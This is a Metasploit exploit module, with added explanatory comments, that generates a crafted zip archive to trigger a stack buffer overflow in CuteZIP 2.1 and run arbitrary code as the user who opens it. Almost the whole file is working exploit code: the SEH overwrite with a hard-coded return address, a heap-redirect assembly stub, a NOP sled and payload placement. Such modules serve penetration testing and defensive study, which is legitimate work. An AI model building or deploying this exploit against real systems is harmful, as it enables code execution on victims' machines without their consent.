##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'rex/zip'
# File-format module: builds a single .zip archive (written via FILEFORMAT's
# file_create) that triggers the stack-based buffer overflow described below in
# CuteZIP 2.1. Control is taken through an SEH record overwrite
# (Msf::Exploit::Remote::Seh / generate_seh_record), so the target depends on a
# fixed, non-rebased address inside CuteZIP.exe and on DEP being off (see the
# "(NO DEP)" note on the target).
class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::FILEFORMAT
  include Msf::Exploit::Remote::Seh

  # Module metadata only; no file is produced here. The one user option is
  # FILENAME, the name of the archive written by #exploit.
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'GlobalSCAPE CuteZIP Stack Buffer Overflow',
        'Description' => %q{
          This module exploits a stack-based buffer overflow vulnerability in version 2.1
          of CuteZIP.

          In order for the command to be executed, an attacker must convince the target user
          to open a specially crafted zip file with CuteZIP. By doing so, an attacker can
          execute arbitrary code as the target user.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'C4SS!0 G0M3S <Louredo_[at]hotmail.com>', # Initial discovery, poc
          'juan vazquez' # Metasploit
        ],
        'References' => [
          [ 'OSVDB', '85709' ],
          [ 'EDB', '16162' ],
          [ 'BID', '46375' ]
        ],
        'Platform' => [ 'win' ],
        'Payload' => {
          # No bad characters are declared; the encoder is not constrained here.
          'BadChars' => "",
          # NOPs are laid out explicitly in #exploit (target['Nops']) rather than
          # by the payload generator.
          'DisableNops' => true,
          'Space' => 3000 # Limit due to the heap chunk size where the payload is stored
        },
        'Targets' => [
          [
            # Tested successfully on:
            # * Windows XP SP3
            # * Windows Vista SP2
            # * Windows 7 SP1
            # (NO DEP)
            'CuteZIP 2.1 / Windows Universal',
            {
              # A hard-coded address in the main executable: the target only
              # works while CuteZIP.exe loads at its fixed base (no ASLR).
              'Ret' => 0x0040112F, # pop, pop, ret from CuteZIP.exe
              # Bytes of filler before the SEH record is reached.
              'Offset' => 1148,
              # Number of single-byte NOPs placed between the asm stub and the payload.
              'Nops' => 398
            }
          ],
        ],
        'DisclosureDate' => '2011-02-12',
        'DefaultTarget' => 0,
        # Reliability, stability and side effects have not been characterised.
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        OptString.new('FILENAME', [ true, 'The output file name.', 'msf.zip'])
      ]
    )
  end

  # Builds the crafted buffer, wraps it in a zip archive and writes it to
  # datastore['FILENAME']. Buffer layout, in order:
  #   [ Offset bytes of random filler ][ SEH record -> target.ret ]
  #   [ asm stub below ][ Nops x make_nops(1) ][ payload.encoded ]
  # The statement order is the layout; do not reorder the << appends.
  def exploit
    # Assembled with Metasm at runtime. By its name, and the 'Space' comment
    # above, this stub presumably transfers execution to the heap copy of the
    # buffer via a register-held pointer — not verifiable from this file.
    redirect_heap = <<-ASM
      popad
      popad
      popad
      push ecx
      pop eax
      call eax
    ASM

    crafted_file = rand_text(target['Offset'])
    crafted_file << generate_seh_record(target.ret)
    crafted_file << Metasm::Shellcode.assemble(Metasm::Ia32.new, redirect_heap).encode_string
    crafted_file << make_nops(1) * target['Nops']
    crafted_file << payload.encoded

    # Create the file
    zip = Rex::Zip::Archive.new
    xtra = rand_text(4)
    # NOTE(review): crafted_file is passed as the first argument of
    # Rex::Zip::Archive#add_file, i.e. as the archive entry's *name*, with only
    # four random bytes as entry data. An archive whose entry name runs to
    # several kilobytes is therefore the artifact a scanner or IR analyst would
    # look for — confirm against the Rex::Zip API in use.
    zip.add_file(crafted_file, xtra)

    print_status("Creating '#{datastore['FILENAME']}' file...")
    file_create(zip.pack)
  end
end